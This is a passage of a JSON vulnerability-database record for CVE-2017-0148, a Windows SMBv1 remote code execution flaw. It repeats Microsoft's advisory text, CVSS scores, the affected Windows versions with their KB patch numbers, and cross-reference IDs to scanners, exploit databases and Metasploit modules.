"KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": 
"Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 
for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-13T00:46:29", "differentElements": ["msAffectedSoftware"], "edition": 41}, {"bulletin": {"id": 
"MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-13T04:50:53", "history": [], "viewCount": 106, 
"enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", 
"idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3213986", "KB4012216", "KB4012212", "KB4012215", "KB4012606", "KBMS16-110, 3187754", "KB3205401", "KB3210721", "KB4013198", "KB4012214", "KB4012217", "KB4012598", "KB4013429", "KB3210720", "KB4012213", "KB3205409", "KB3177186", "KB3212646"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", 
"kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 
32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-13T04:50:53", "differentElements": ["msAffectedSoftware"], "edition": 42}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-13T06:59:52", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012215", "KB3210720", "KB3205401", "KB4013198", "KB4012216", "KB3205409", "KB3212646", "KB3213986", 
"KB4012213", "KBMS16-110, 3187754", "KB4012212", "KB4012598", "KB4012606", "KB4012217", "KB4013429", "KB4012214", "KB3177186", "KB3210721"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 
(Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": 